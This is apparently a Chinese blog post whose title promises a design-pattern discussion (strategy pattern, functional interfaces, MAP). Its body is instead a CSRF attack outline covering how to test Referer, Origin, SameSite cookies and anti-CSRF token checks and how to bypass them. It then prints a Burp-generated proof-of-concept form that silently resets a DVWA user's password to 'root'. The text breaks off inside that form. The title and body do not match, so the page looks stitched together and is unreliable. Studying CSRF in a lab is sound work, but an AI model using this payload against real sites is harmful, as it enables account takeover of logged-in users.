多种异构数据的分析设计方案3：聊聊策略模式+函数式接口+MAP

目录

1. 检查referer

referer绕过

2. 检查origin

3. Cookie检查

SameSite

持久性验证

4. Token检查

检测token编码类型，尝试篡改token

绕过token检测

在页面上尝试修改密码, 观察请求的格式.

绕过思路

1. 编写一个js脚本完成以下的任务:

2. 引诱登录的用户触发这个js脚本就可以完成修改密码的攻击.

1. 检查referer

设置一个虚假的referer 与 源请求头均请求后做比较，如果返回的长度相同，那么网站在处理HTTP请求之前实际上不会验证referer

referer绕过

当使用一个普通的表单类型的钓鱼链接时, 比如 http://192.168.112.202/csrf.html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.112.200/DVWA-master/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="root" />
      <input type="hidden" name="password&#95;conf" value="root" />
      <input type="hidden" name="Change" value="Change" />
      <input type="